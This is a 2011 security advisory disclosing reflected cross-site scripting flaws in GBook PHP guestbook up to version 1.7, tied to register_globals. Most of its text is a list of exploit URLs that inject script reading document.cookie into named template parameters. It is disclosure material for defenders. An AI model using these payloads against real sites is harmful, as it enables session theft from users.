High-Tech Bridge Security Advisory HTB23028
History: Jul 06, 2011 - 12:00 a.m.

Cross-site Scripting (XSS) Vulnerabilities in GBook PHP guestbook

Date: 2011-07-06 00:00:00
Source: High-Tech Bridge (www.htbridge.com)

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in GBook PHP guestbook, which could be exploited to perform cross-site scripting attacks.

  1. Cross-site scripting (XSS) vulnerabilities in GBook PHP guestbook
    The vulnerabilities exist because multiple parameters handled by the scripts in the /templates/default/ directory are not sanitized before being written into the page. A remote attacker can send a specially crafted HTTP request to a vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that "register_globals" is enabled: with that directive on, request parameters such as error, comments or settings[target] are registered as PHP variables, which the template scripts then output unescaped, so the values can be supplied directly in the query string as in the examples below. Note that register_globals was deprecated in PHP 5.3.0 and removed in PHP 5.4.0, so the examples only apply to installations running on older PHP with the directive turned on.
    Exploitation examples:
    http://[host]/templates/default/admin_reply.php?error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/admin_reply.php?comments=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/admin_reply.php?nosmileys=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/admin_reply.php?num=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/comments.php?name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/comments.php?from=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/comments.php?email=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/comments.php?added=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/comments.php?i=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/admin_tasks.php?error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/admin_tasks.php?task=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/admin_tasks.php?task_description=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/admin_tasks.php?action=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/admin_tasks.php?button=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/admin_tasks.php?num=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/emoticons_popup.php?list_emoticons=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/error.php?myproblem=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/error.php?backlink=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/no_comments.php?lang[t06]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/overall_footer.php?settings[pages_top]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/overall_footer.php?settings[show_nospam]=1&settings[target]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/overall_footer.php?settings[show_nospam]=1&settings[tpl_path]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/overall_header.php?settings[gbook_title]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://[host]/templates/default/sign_form.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
CPE
Name                 Operator                    Version
gbook php guestbook  le (less than or equal to)  1.7